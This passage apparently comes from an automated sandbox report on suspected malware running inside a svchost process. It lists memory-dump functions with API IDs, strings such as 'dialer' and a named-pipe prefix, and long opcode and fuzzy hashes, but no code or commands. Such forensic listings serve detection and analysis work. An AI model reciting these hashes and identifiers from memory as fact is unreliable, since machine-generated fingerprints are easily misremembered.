                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E113C36B0474582EF549B61F4247AABAB0F788B95F940139EE8907768EF3DC585C704
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB145B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                                                            • Instruction ID: 9b062e490fe02f02ff9595d3c5a270bd464ef36ea034a3e5027507b39aef7793
                                                                                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                                                            • Instruction Fuzzy Hash: A6D19C76604B8886DA70DB56E4A439A7BA0F7CCB84F500616EACD47BB9DF3CC591CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB142F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID: dialer
                                                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction ID: 8d7a894f2b75a29da1e635688610dd8eac0ac45f6fa711624785a941682a6ccb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31A232B11B5582EA55CF96E5607A97BA0FB48B80F884120FE4847B79EF34C4E1C780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB1414A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                                                            • String ID: C:\Windows\System32\svchost.exe
                                                                                                                                                                                            • API String ID: 3168794593-3822071397
                                                                                                                                                                                            • Opcode ID: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction ID: 45e4bfd81b258130c2878c13e7ef2aa785d4482a7606156c536537e6ab1822a2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 79314DB7909AC4CAF3519BB598B52AD3FF0F7DDF40F898015EA840366BEA35C4948780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction ID: 3ce6a464db36dbe231f539e625a41c61ab1a4fe27311875c6926c2247d4626c4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 23113D30F0528441FE64A7B255753E96A926B8C7F4F944724F836477FEDE78C8C18640
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction ID: b56cc4a9219ce173573b35b060b40dacd4efe97abbc4aae6d3c36203a32190ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D014031B00A8082EB54DB92A4A87996BA5FB8CFC5F984035EE4D43769DF3CC589C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB1436C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction ID: aea3523d5b696279904d0a9f1d0b5acdef4e51f47aaabb769f8f72a283c239a1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 01012D75B1174482FB249BA1F82879A7BB0BB4DB86F840424ED49077B9EF3DC5988750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB149005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction ID: 431290c4c3ab092a09d6f97ded21218179382b6830118b0e229e3433f22b8405
                                                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0351B232B11600CEEB54DF55E868B993B96F34AFE8F908124EA16477ACEB75C9C1C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB148FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction ID: c483b976e71ea0b883becd5ea67814c42be2e62489908683eae6e364c117f3c0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction Fuzzy Hash: B331C032B10640CAE714DF91E8687993FA9F349BD8F958114FE5A077ADDB39C980C744
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB141A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                            • String ID: \\?\
                                                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction ID: 849fd659aeb8b6c1eef8404c1304ab30d81d27248a5e64f6e149dd43ce34c99b
                                                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AF03132B0468192E7608BA1E8A47996BB1F74CBC8FD44020EA4947568DE3CC6CDCB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB143044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction ID: 39c62d7ff73d9df768cd81ca70d6262b0c5a93aa8e370f6e818c86b01c5f46a1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction Fuzzy Hash: 94F0F874B14B8482EA948B93B9242996AB1AB4CFD0F889130FE4A47B6CDE38C5C5C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction ID: 4939e3b87bf7fe4bf720d1a0dc3e35d14a120877e0fdf91011b5bd2737b4d96b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 24F06271A1160481FB108BA4E46539A6BB0EB8C7A5FD40319EA6A471FCCF3CC1C4C340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB1450D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                                                            • Instruction ID: 0c9d8c590311c688053b78a2b42c4e8702ba264ebdfeef01166dd84d41b1d2a9
                                                                                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                                                                                            • Instruction Fuzzy Hash: B702BB32619B8486E760CB95F4A079ABBA0F3C9794F501515FA8E87BADDF7CC494CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB145710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                                                            • Instruction ID: 715d8031f781b195eaa54536456ee4422aa1990d63212575f18fd379ff474c85
                                                                                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                                                                                            • Instruction Fuzzy Hash: C8619836919B85C6E7608B96E46435ABBA0F38C794F901115FA8E87BBCDB7CC594CF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB413504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction ID: 63e741845e30555b2dc79199f542b165c725312b7be0c15b85454b56ba803039
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA11A333E50E1131FA6495E9E471BE91D806B59BF4FC88A28FB66262F6DA34C8C14200
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB154104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction ID: 29976699dfc5f6db890eeb92f681ee6369f2a0b333b4dc6f5bcfa7218e49d877
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3119132E10A7091F66455E8D4B33E519F16B6CBF8FD80624F976076FE8A34D8C14240
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB40F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                                                            • Instruction ID: 06ff0b4f0cce51775c7042ab016a9ddf3ef42feae66f0e2a9cd6c2fc57e87b47
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0261A176E0464082FA69DBE8E5703FA6EA1EB85780FF14539FB0A177B5DB35C8C18201
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction ID: 4cef527e814f84670e8c0c982b15171a2ceedb8f56773f7bbb9697b9000b5036
                                                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                                                            • Instruction Fuzzy Hash: 54618B33A10B848AEB20DFA5D4903DD7BA1F348B8CF554215EF8917BA8DB78D599C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB40A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction ID: 3ea2a197d37320ed178d160b2214e9d0a2a95c4972ce234298f4a18f4600df30
                                                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D518F32901381CAEB64CFA595743E87BA0F755B84FA84229FB9987BE5CB38D4D0C701
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB14AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2465974806.00000142DB140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000142DB140000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db140000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction ID: fb9bd648368992db92c11e036fea3ddc01667d61f4a47c76a277892e64a7eb71
                                                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                                                            • Instruction Fuzzy Hash: D251D1729207808AEB748F9591A43DD7FA0F358B84F954126FA9987BEDCB38C4D4C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB408405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction ID: ad243aa99022eb2970de7bd7d378c8a62c4c83db627cc2f481360d880b802005
                                                                                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1851B132F116008AEB94CF55E574B993BA5F394B98FA08124FF56577A8FB34C8C18B04
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB4083E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.2466799822.00000142DB400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000142DB400000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_142db400000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction ID: 3288d81911dc04953b01763c670073d3d52877f08a0ebef0c21800ba19d51fc6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                                                                            • Instruction Fuzzy Hash: 93318B32A1165096E794DF51E974B997BA4F340BD8FA58014FF9A077A8EB38C981CB04
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00000142DB152058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
